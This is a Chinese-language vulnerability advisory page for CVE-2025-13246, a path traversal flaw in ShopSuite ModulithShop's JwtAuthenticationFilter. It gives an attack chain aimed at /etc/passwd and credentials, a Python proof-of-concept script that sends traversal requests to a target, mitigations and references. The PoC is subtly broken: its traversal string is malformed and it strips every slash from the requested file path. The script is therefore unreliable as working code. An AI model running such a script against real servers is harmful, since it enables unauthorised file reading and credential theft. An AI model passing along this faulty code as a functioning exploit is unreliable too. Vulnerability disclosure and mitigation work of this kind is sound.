CVE-2025-13246 | ShopSuite ModulithShop JwtAuthenticationFilter路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-13246

漏洞类型

路径遍历

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

shsuishang ShopSuite ModulithShop

漏洞概述

CVE-2025-13246是shsuishang ShopSuite ModulithShop中的一个中等严重性路径遍历漏洞。该漏洞存在于JwtAuthenticationFilter组件中，攻击者可以通过构造特殊的文件路径请求来访问服务器上的任意文件。ShopSuite是一个基于Java的电商系统，其ModulithShop模块在处理认证和文件请求时存在安全缺陷。漏洞影响版本至提交commit 45a99398cec3b7ad7ff9383694f0b53339f2d35a。由于该产品采用滚动发布模式，无法提供确切的版本号范围。攻击者可利用公开的漏洞利用代码远程发起攻击，无需高权限即可执行，成功利用后可读取服务器敏感文件或进行进一步的攻击。由于CVSS评分为6.3，属于中危漏洞，但结合路径遍历的潜在危害，攻击者可能获取系统配置信息、源代码或凭据等敏感数据，对业务系统造成严重威胁。建议受影响的用户尽快评估安全风险并采取相应的防护措施。

技术细节

该路径遍历漏洞位于src/main/java/com/suisung/shopsuite/common/security/JwtAuthenticationFilter.java文件中的JwtAuthenticationFilter函数。漏洞的根本原因是在处理用户请求时，未对用户提供的文件路径进行充分的验证和过滤，允许攻击者通过../或..\等路径遍历序列访问服务器上的受保护资源。攻击者可以通过构造类似../../../../etc/passwd的请求来读取系统敏感文件。在JwtAuthenticationFilter组件中，由于认证过滤逻辑存在缺陷，恶意构造的路径可能在身份验证过程中被错误处理，导致路径遍历攻击成功。攻击者利用此漏洞可以：(1) 读取任意文件内容，包括配置文件、源代码、密钥等；(2) 结合其他漏洞可能实现远程代码执行；(3) 获取系统敏感信息用于进一步攻击。该漏洞的利用复杂度较低，公开的漏洞利用代码使得攻击门槛进一步降低。建议开发者使用白名单机制验证文件路径，采用realpath()等函数规范化路径，并确保所有文件访问操作都在允许的目录范围内。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为shsuishang ShopSuite ModulithShop，确认JwtAuthenticationFilter组件存在且可访问

STEP 2

步骤2: 构造恶意请求

攻击者构造包含路径遍历序列(../../../../etc/passwd)的URL，利用JwtAuthenticationFilter的文件路径处理缺陷

STEP 3

步骤3: 发送攻击请求

通过HTTP GET请求发送构造的路径遍历payload，无需高权限认证即可触发漏洞

STEP 4

步骤4: 文件读取

服务器错误处理路径遍历请求，返回目标文件内容(如/etc/passwd、配置文件、源代码等敏感文件)

STEP 5

步骤5: 权限提升

攻击者利用获取的敏感信息(如数据库凭据、API密钥、源代码)进行进一步攻击，可能实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-13246 Path Traversal PoC
Target: shsuishang ShopSuite ModulithShop JwtAuthenticationFilter
"""

import requests
import sys

def exploit(target_url, file_path):
    """
    Path traversal exploit for JwtAuthenticationFilter
    """
    # Construct path traversal payload
    traversal = "../../.." + "../" * 5
    target_file = f"/{file_path}".replace("/", "")
    
    # Build the malicious URL
    exploit_url = f"{target_url.rstrip('/')}/auth{traversal}{target_file}"
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploit URL: {exploit_url}")
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': '*/*'
    }
    
    try:
        response = requests.get(exploit_url, headers=headers, timeout=10, verify=False)
        print(f"[+] Status Code: {response.status_code}")
        if response.status_code == 200:
            print(f"[+] File Content:\n{response.text[:500]}")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_url> <file_path>")
        print(f"Example: {sys.argv[0]} http://target.com /etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    file_to_read = sys.argv[2]
    exploit(target, file_to_read)

影响范围

shsuishang ShopSuite ModulithShop <= 45a99398cec3b7ad7ff9383694f0b53339f2d35a

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：(1) 在Web应用层配置URL过滤规则，拦截包含../、..\、%2e%2e等路径遍历特征字符的请求；(2) 限制JwtAuthenticationFilter组件的访问权限，仅允许受信任的IP地址访问；(3) 在服务器层面配置防火墙规则，禁止对敏感目录的访问；(4) 临时禁用或限制文件读取功能的使用；(5) 加强日志监控，及时发现和响应异常的文件访问行为；(6) 对系统文件设置严格的访问权限，防止通过路径遍历读取敏感配置。建议同时进行全面的安全评估，排查是否存在其他相关漏洞，并在测试环境中验证缓解措施的有效性后再部署到生产环境。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13246
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13246
3 Details https://www.cvedetails.com/cve/CVE-2025-13246/
4 VulDB https://vuldb.com/cve/CVE-2025-13246
5 Link https://github.com/shsuishang/modulithshop/issues/1
6 Link https://vuldb.com/?ctiid.332580
7 Link https://vuldb.com/?id.332580
8 Link https://vuldb.com/?submit.687532